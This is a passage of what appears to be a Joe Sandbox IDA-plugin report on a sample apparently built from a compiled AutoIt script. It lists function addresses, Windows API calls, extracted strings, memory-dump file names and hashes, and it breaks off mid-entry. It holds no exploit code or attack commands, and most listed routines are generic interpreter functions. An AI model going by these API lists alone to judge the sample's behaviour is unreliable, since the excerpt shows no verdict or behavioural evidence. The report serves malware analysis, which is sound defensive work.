                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID: ,,?
                                                            • API String ID: 2395222682-1094787077
                                                            • Opcode ID: 5c0c64602abdc4c21debcb99a27d4c37fc77db65c431f1c487796a8a8624b997
                                                            • Instruction ID: 746aae8dc4c82b6e3482aa1c36c17a9c74daf26525238c8a751cf51950231374
                                                            • Opcode Fuzzy Hash: 5c0c64602abdc4c21debcb99a27d4c37fc77db65c431f1c487796a8a8624b997
                                                            • Instruction Fuzzy Hash: 48C114B2608305AFC701DF64D88496AB7E9FF89348F00491EF98A9B261DB71ED05CB52
                                                            Function 003E0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DFDAD,?,?), ref: 003E0E31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            • Opcode ID: 5635db026eba6fd85b378bca01a37397cbc27834a421c97757aa682e9615fe77
                                                            • Instruction ID: 84a61d1c85112a3de9fa92fa7cfa81084289e26a077c596ab975b0898f7f391d
                                                            • Opcode Fuzzy Hash: 5635db026eba6fd85b378bca01a37397cbc27834a421c97757aa682e9615fe77
                                                            • Instruction Fuzzy Hash: BE41B03150439A8BCF1AEF10D8A2AEF3364AF11304F454565FC911B295DB789DAACBA0
                                                            Function 003BF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0039E2A0,00000010,?,Bad directive syntax error,003EF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003BF7C2
                                                            • LoadStringW.USER32(00000000,?,0039E2A0,00000010), ref: 003BF7C9
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • _wprintf.LIBCMT ref: 003BF7FC
                                                            • __swprintf.LIBCMT ref: 003BF81E
                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003BF88D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 1506413516-4153970271
                                                            • Opcode ID: 7b6ada2ce4853b7387d1ec0b6cb46fef6f70de5f2a68a5cac7e0759be7a21dcd
                                                            • Instruction ID: bc008beeb485bf39a46aa74906f94a25dd616f096297ed4a6b57c3531926154e
                                                            • Opcode Fuzzy Hash: 7b6ada2ce4853b7387d1ec0b6cb46fef6f70de5f2a68a5cac7e0759be7a21dcd
                                                            • Instruction Fuzzy Hash: B6213C3290021EEFCF13AF90CC4AEEE7779BF18304F04486AF5156A1A2EA719658DB51
                                                            Function 003C52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                              • Part of subcall function 00367924: _memmove.LIBCMT ref: 003679AD
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003C5330
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003C5346
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003C5357
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003C5369
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003C537A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: SendString$_memmove
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 2279737902-1007645807
                                                            • Opcode ID: 5c965bb7f71f457169cbf1d251d3f40f89602751e635fc96a3572c32502edf73
                                                            • Instruction ID: e45ef0be6072be581803c245f6ae6a1f44f8efa3fd3e087cfd17244bdc49f000
                                                            • Opcode Fuzzy Hash: 5c965bb7f71f457169cbf1d251d3f40f89602751e635fc96a3572c32502edf73
                                                            • Instruction Fuzzy Hash: 29118231A5016979D721B661CC4AFFF7BBCEBD5B84F50042EB411E60D5DEA01D84CAA4
                                                            Function 003C46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 208665112-3771769585
                                                            • Opcode ID: 75256ab9a94fa4a630cf69300847b85903c16b5ccb4c1e4a1167468aa836a35a
                                                            • Instruction ID: 20edce0676322692a08db4af5df5a25c749d8c4fa272f21b0a8a73dbc74a8a7d
                                                            • Opcode Fuzzy Hash: 75256ab9a94fa4a630cf69300847b85903c16b5ccb4c1e4a1167468aa836a35a
                                                            • Instruction Fuzzy Hash: 8011D531900214AFCB27BB309C86FDA77BCEB01711F0502BAF855DA091EFB59E858750
                                                            Function 003C4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • timeGetTime.WINMM ref: 003C4F7A
                                                              • Part of subcall function 0038049F: timeGetTime.WINMM(?,7707B400,00370E7B), ref: 003804A3
                                                            • Sleep.KERNEL32(0000000A), ref: 003C4FA6
                                                            • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 003C4FCA
                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003C4FEC
                                                            • SetActiveWindow.USER32 ref: 003C500B
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003C5019
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 003C5038
                                                            • Sleep.KERNEL32(000000FA), ref: 003C5043
                                                            • IsWindow.USER32 ref: 003C504F
                                                            • EndDialog.USER32(00000000), ref: 003C5060
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                            • String ID: BUTTON
                                                            • API String ID: 1194449130-3405671355
                                                            • Opcode ID: b3df05cc126145e132f874779a8ed5799d08a00a75e5059587117f619a1ea79f
                                                            • Instruction ID: c483e73b72d4bac21d754b2f7802e5e924b264e983573ee246d47fe59309a152
                                                            • Opcode Fuzzy Hash: b3df05cc126145e132f874779a8ed5799d08a00a75e5059587117f619a1ea79f
                                                            • Instruction Fuzzy Hash: 20215470204644BFE7325B20ECC8F263A6DEB55749F46113CF501CA1E1CAB19E919B66
                                                            Function 003CD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • CoInitialize.OLE32(00000000), ref: 003CD5EA
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003CD67D
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 003CD691
                                                            • CoCreateInstance.OLE32(003F2D7C,00000000,00000001,00418C1C,?), ref: 003CD6DD
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003CD74C
                                                            • CoTaskMemFree.OLE32(?,?), ref: 003CD7A4
                                                            • _memset.LIBCMT ref: 003CD7E1
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 003CD81D
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003CD840
                                                            • CoTaskMemFree.OLE32(00000000), ref: 003CD847
                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003CD87E
                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 003CD880
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                            • String ID:
                                                            • API String ID: 1246142700-0
                                                            • Opcode ID: c44344c696fad9fcfd13e6e5905415754b16d1773de63896879881b8967201db
                                                            • Instruction ID: e7c9af46e04fd33ff54d975446f107e2be1e60160744028c00d8ef4b072e064d
                                                            • Opcode Fuzzy Hash: c44344c696fad9fcfd13e6e5905415754b16d1773de63896879881b8967201db
                                                            • Instruction Fuzzy Hash: 33B1F975A00109AFDB15DFA4C885EAEBBB9FF48304F1485A9F909EB261DB30ED45CB50
                                                            Function 003BC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 003BC283
                                                            • GetWindowRect.USER32(00000000,?), ref: 003BC295
                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 003BC2F3
                                                            • GetDlgItem.USER32(?,00000002), ref: 003BC2FE
                                                            • GetWindowRect.USER32(00000000,?), ref: 003BC310
                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 003BC364
                                                            • GetDlgItem.USER32(?,000003E9), ref: 003BC372
                                                            • GetWindowRect.USER32(00000000,?), ref: 003BC383
                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 003BC3C6
                                                            • GetDlgItem.USER32(?,000003EA), ref: 003BC3D4
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003BC3F1
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 003BC3FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: 5bc63f73efca4f3e5d63334ab7ff9499d4651afc3b222d9bc9b679d2c14af982
                                                            • Instruction ID: 0cc4d3675484d8d0307853c010ad93c73823edccd7a8f888986324696ef948bd
                                                            • Opcode Fuzzy Hash: 5bc63f73efca4f3e5d63334ab7ff9499d4651afc3b222d9bc9b679d2c14af982
                                                            • Instruction Fuzzy Hash: 47514571B10205AFDF19CFA9DD95AAEBBBAEB88710F14852DF619D72D0D7B09D008B10
                                                            Function 0036201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00361B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00362036,?,00000000,?,?,?,?,003616CB,00000000,?), ref: 00361B9A
                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003620D3
                                                            • KillTimer.USER32(-00000001,?,?,?,?,003616CB,00000000,?,?,00361AE2,?,?), ref: 0036216E
                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0039BCA6
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003616CB,00000000,?,?,00361AE2,?,?), ref: 0039BCD7
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003616CB,00000000,?,?,00361AE2,?,?), ref: 0039BCEE
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003616CB,00000000,?,?,00361AE2,?,?), ref: 0039BD0A
                                                            • DeleteObject.GDI32(00000000), ref: 0039BD1C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 641708696-0
                                                            • Opcode ID: 978596c4a0a4317b8916a04c6c44012a6e8cdd63344d66a6efb6e790501c57a7
                                                            • Instruction ID: bb28aab3e1e019db7ebe4f3dec72326c906aee24782f1994472ea162c4f511d2
                                                            • Opcode Fuzzy Hash: 978596c4a0a4317b8916a04c6c44012a6e8cdd63344d66a6efb6e790501c57a7
                                                            • Instruction Fuzzy Hash: 88618C30201A50DFCB37AF14D988B2AB7F5FB40312F52C529E5429B9B8C7B4A891DF54
                                                            Function 003621A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 003625DB: GetWindowLongW.USER32(?,000000EB), ref: 003625EC
                                                            • GetSysColor.USER32(0000000F), ref: 003621D3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ColorLongWindow
                                                            • String ID:
                                                            • API String ID: 259745315-0
                                                            • Opcode ID: ce9ae9ed0905cb4b71766bf660905bbeb69d4b1df5f9c67c68e321c990354f46
                                                            • Instruction ID: 357a0d9da4ea80a5aa9f6c74d67a81a56fb5f13e11353e677db2405f4f8a1b47
                                                            • Opcode Fuzzy Hash: ce9ae9ed0905cb4b71766bf660905bbeb69d4b1df5f9c67c68e321c990354f46
                                                            • Instruction Fuzzy Hash: F5419F311009449FDB235F28EC98BBA3B69EB06321F168765FE658E1E9C7718D42DB21
                                                            Function 003CA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,003EF910), ref: 003CA90B
                                                            • GetDriveTypeW.KERNEL32(00000061,004189A0,00000061), ref: 003CA9D5
                                                            • _wcscpy.LIBCMT ref: 003CA9FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 2820617543-1000479233
                                                            • Opcode ID: e98d87326a9310e07bc2da509a46801002bcd0a56805874843dbe9de2e25e5e3
                                                            • Instruction ID: 53ad8a402c02e5fb258b5fe595a38965cd56abc9d80557abdd29fe9a25e93d35
                                                            • Opcode Fuzzy Hash: e98d87326a9310e07bc2da509a46801002bcd0a56805874843dbe9de2e25e5e3
                                                            • Instruction Fuzzy Hash: 8751A0355183049BC706EF14C892FAFB7A9EF84308F15882DF4959B2A2DB319D09CB53
                                                            Function 00369837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __i64tow__itow__swprintf
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 421087845-2263619337
                                                            • Opcode ID: 8a9da28bbaae634f5db8d5e3e847c622e5e0b8c72e0269a33457f9b8e4722c12
                                                            • Instruction ID: cc2fa0a2fb218c562da61c9b174cae607d5a8a5fd2511ac1a725399ea1effda5
                                                            • Opcode Fuzzy Hash: 8a9da28bbaae634f5db8d5e3e847c622e5e0b8c72e0269a33457f9b8e4722c12
                                                            • Instruction Fuzzy Hash: 0C41C571504309AFDB26EF34D842B7A73ECEF06310F2184AEE549DB295EA3199458B10
                                                            Function 003E7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 003E716A
                                                            • CreateMenu.USER32 ref: 003E7185
                                                            • SetMenu.USER32(?,00000000), ref: 003E7194
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003E7221
                                                            • IsMenu.USER32(?), ref: 003E7237
                                                            • CreatePopupMenu.USER32 ref: 003E7241
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003E726E
                                                            • DrawMenuBar.USER32 ref: 003E7276
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                            • String ID: 0$F
                                                            • API String ID: 176399719-3044882817
                                                            • Opcode ID: 90b945406cc4f1e3dfd43082aba7d58a063386b4f52434290e4ba924abf718b6
                                                            • Instruction ID: f9a96d6a6b848b31b394177bb134a5ab5474654dced76d3a0a81df6f0fe26a6f
                                                            • Opcode Fuzzy Hash: 90b945406cc4f1e3dfd43082aba7d58a063386b4f52434290e4ba924abf718b6
                                                            • Instruction Fuzzy Hash: AA418B74A01255EFDB21DF65E884EDA7BB9FF49300F154628FA059B390D771A910CF90
                                                            Function 003E74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003E755E
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 003E7565
                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003E7578
                                                            • SelectObject.GDI32(00000000,00000000), ref: 003E7580
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 003E758B
                                                            • DeleteDC.GDI32(00000000), ref: 003E7594
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 003E759E
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003E75B2
                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003E75BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                            • String ID: static
                                                            • API String ID: 2559357485-2160076837
                                                            • Opcode ID: 470a0b326435326e02718638c1a49f887262f29165e6d055e2973b1a040eacef
                                                            • Instruction ID: dd9727c1ef3430c14b29751d8e86866885766670b765f714f5599b5130b845f3
                                                            • Opcode Fuzzy Hash: 470a0b326435326e02718638c1a49f887262f29165e6d055e2973b1a040eacef
                                                            • Instruction Fuzzy Hash: D2314B311041A4AFDF229F65DC48FEA3B69EF0A360F114325FA159A0E0C771D811DB64
                                                            Function 00386E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00386E3E
                                                              • Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28
                                                            • __gmtime64_s.LIBCMT ref: 00386ED7
                                                            • __gmtime64_s.LIBCMT ref: 00386F0D
